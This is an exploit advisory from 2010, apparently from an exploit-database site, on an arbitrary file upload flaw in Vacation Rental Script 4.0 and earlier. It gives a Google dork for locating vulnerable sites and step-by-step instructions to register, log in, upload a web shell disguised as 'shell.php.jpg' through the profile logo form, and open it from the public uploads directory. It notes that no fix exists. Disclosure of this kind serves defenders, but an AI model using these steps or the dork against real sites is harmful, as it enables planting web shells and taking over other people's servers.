Vacation Rental Script v4.0 Arbitrary File Upload Vulnerability

2010-12-20 17:15:07

Script Name: Vacation Rental Script <= 4.0
Site: http://www.vacationrentalscript.com/

Bug: Upload Shell
Found: Br0ly
google dork: "2006 - 2009 Vacation Rental Script" BraZIL!!

You need register a account first so:

Signup: http://server/signup

Cheek your email for login and password

So login in:

http://server/members/login

After login:
Go to:

http://server/members/profile

at the bottom of the page you can upload a logo why not a lithe and nice
shell?

Upload a shell type: shell.php.jpg or shell.php.jpeg

after upload:

http://server/public/upload/logos/youshell.php.jpg

Fixes

No fixes

In order to submit a new fix you need to be registered.